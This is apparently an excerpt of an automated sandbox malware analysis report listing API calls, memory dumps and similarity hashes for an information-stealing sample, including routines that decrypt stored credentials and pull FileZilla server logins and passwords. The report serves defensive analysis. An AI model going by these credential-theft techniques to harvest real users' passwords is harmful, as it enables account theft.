                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,030253EB,40000001,00000000,00000000,?,030253EB), ref: 03039127
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction ID: c71b56f98f2cd23aa5a16e95000e1acb20b157f3c1344fbe0d2839d0e7a86391
                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction Fuzzy Hash: C7111F74205204BFDB40CF98DC98FAB33ADAF8A740F049558F9099B250D7B5E841DBA0
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03025155,00000000,00000000), ref: 03029D56
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,03025155,00000000,?), ref: 03029D68
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03025155,00000000,00000000), ref: 03029D91
                                            • LocalFree.KERNEL32(?,?,?,?,03025155,00000000,?), ref: 03029DA6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID:
                                            • API String ID: 4291131564-0
                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction ID: 75ff1fb9df4b90c3750d7eab07a0051c49a067124b68ff7ef204391537fd3a21
                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction Fuzzy Hash: FF11A4B4241208BFEB10CFA4CC95FAA77B5EB89704F208058FD159B390C776A911CB90
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                            • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                            • LocalFree.KERNEL32(?), ref: 00409BD3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 03029DEB
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 03029E0A
                                            • memcpy.MSVCRT(?,?,?), ref: 03029E2D
                                            • LocalFree.KERNEL32(?), ref: 03029E3A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                            • String ID:
                                            • API String ID: 3243516280-0
                                            • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction ID: fe817257789c9ecaf9123ad83793e83cdc5827dbc1025174a3cb9e8fb9ca1a99
                                            • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                            • Instruction Fuzzy Hash: FE11FAB8A00209EFDB04CFA4D985EAEB7F5FF89300F104558E91597350D730AA10CF61
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02E29508,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02E29508,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02E29508,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                            • wsprintfA.USER32 ref: 00417AB7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                            • String ID:
                                            • API String ID: 362916592-0
                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                            • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                            APIs
                                            • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID:
                                            • API String ID: 123533781-0
                                            • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                            • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                            • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                            • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: .$GetProcAddress.$l
                                            • API String ID: 0-2784972518
                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction ID: 8fe9922eee26ec2ff497052f0163fe7fddfb08bd8bec19ed776bffb0e76b01c0
                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                            • Instruction Fuzzy Hash: 0F3139B6911719DFDB10CF99C880AAEBBF9FF48324F15408AD441AB210D771EA45CBA4
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                            • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0303D156
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                            • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                            • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1600995022.0000000002DFA000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dfa000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 1121f7aa06c3cd5a7cbd109934468e6bd258541dae2da6743e6d7ad35754798c
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 2B118E72340100AFD784DF55DC81FA673EAEB8D324B1A80A5EE08CB312D679EC01CB64
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: 4108d944e45da072369d381be92cb3da849b85a5bc62d0bd2e85f892a7023a79
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: 6701DB76A027148FDF21CF24CC44BAA77F9FB85215F4944F5D506D7241E774A941CB90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction ID: 2e2bd405f19086ff132890947512edf265da7a4b7df51a80f274dea9cc5bcef7
                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction Fuzzy Hash: 73711735152B40DBD7637B33DD01EEA7ABA7F8A302F114B24A1DB2C534CE3268619B51
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • strtok_s.MSVCRT ref: 0041031B
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                            • lstrlenA.KERNEL32(00000000), ref: 00410393
                                              • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                              • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                            • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                            • lstrlenA.KERNEL32(00000000), ref: 00410427
                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                            • lstrlenA.KERNEL32(00000000), ref: 00410475
                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                            • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                            • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                            • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                            • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                            • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                            • strtok_s.MSVCRT ref: 00410679
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                            • memset.MSVCRT ref: 004106DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                            • API String ID: 337689325-514892060
                                            • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                            • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                            • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                            • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                            APIs
                                            • lstrlen.KERNEL32(00424DA0), ref: 03024833
                                            • lstrlen.KERNEL32(00424E50), ref: 0302483E
                                            • lstrlen.KERNEL32(00424F18), ref: 03024849
                                            • lstrlen.KERNEL32(00424FD0), ref: 03024854
                                            • lstrlen.KERNEL32(00425078), ref: 0302485F
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 0302486E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03024875
                                            • lstrlen.KERNEL32(00425120), ref: 03024883
                                            • lstrlen.KERNEL32(004251C8), ref: 0302488E
                                            • lstrlen.KERNEL32(00425270), ref: 03024899
                                            • lstrlen.KERNEL32(00425318), ref: 030248A4
                                            • lstrlen.KERNEL32(004253C0), ref: 030248AF
                                            • lstrlen.KERNEL32(00425468), ref: 030248C3
                                            • lstrlen.KERNEL32(00425510), ref: 030248CE
                                            • lstrlen.KERNEL32(004255B8), ref: 030248D9
                                            • lstrlen.KERNEL32(00425660), ref: 030248E4
                                            • lstrlen.KERNEL32(00425708), ref: 030248EF
                                            • lstrlen.KERNEL32(004257B0), ref: 03024918
                                            • lstrlen.KERNEL32(00425858), ref: 03024923
                                            • lstrlen.KERNEL32(00425920), ref: 0302492E
                                            • lstrlen.KERNEL32(004259C8), ref: 03024939
                                            • lstrlen.KERNEL32(00425A70), ref: 03024944
                                            • strlen.MSVCRT ref: 03024957
                                            • lstrlen.KERNEL32(00425B18), ref: 0302497F
                                            • lstrlen.KERNEL32(00425BC0), ref: 0302498A
                                            • lstrlen.KERNEL32(00425C68), ref: 03024995
                                            • lstrlen.KERNEL32(00425D10), ref: 030249A0
                                            • lstrlen.KERNEL32(00425DB8), ref: 030249AB
                                            • lstrlen.KERNEL32(00425E60), ref: 030249BB
                                            • lstrlen.KERNEL32(00425F08), ref: 030249C6
                                            • lstrlen.KERNEL32(00425FB0), ref: 030249D1
                                            • lstrlen.KERNEL32(00426058), ref: 030249DC
                                            • lstrlen.KERNEL32(00426100), ref: 030249E7
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 03024A03
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID:
                                            • API String ID: 2127927946-0
                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                            • Instruction ID: 6d07d4bf3d0140fccb54e41e9ffb6105f36dd92b1840c6fcd6bf3bd4a12834d0
                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                            • Instruction Fuzzy Hash: 2E41C979740634EBC718AFE6FC89B987F71AB4C712BA0C062F90295190CBB5D5019B3D
                                            APIs
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 03039B08
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 03039B21
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 03039B39
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 03039B51
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 03039B6A
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 03039B82
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 03039B9A
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 03039BB3
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 03039BCB
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 03039BE3
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 03039BFC
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 03039C14
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 03039C2C
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 03039C45
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 03039C5D
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 03039C75
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 03039C8E
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 03039CA6
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 03039CBE
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 03039CD7
                                            • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 03039CEF
                                            • LoadLibraryA.KERNEL32(0064A550,?,03036C67), ref: 03039D01
                                            • LoadLibraryA.KERNEL32(0064A17C,?,03036C67), ref: 03039D12
                                            • LoadLibraryA.KERNEL32(0064A104,?,03036C67), ref: 03039D24
                                            • LoadLibraryA.KERNEL32(0064A1DC,?,03036C67), ref: 03039D36
                                            • LoadLibraryA.KERNEL32(0064A328,?,03036C67), ref: 03039D47
                                            • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 03039D69
                                            • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 03039D8A
                                            • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 03039DA2
                                            • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 03039DC4
                                            • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 03039DE5
                                            • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 03039E06
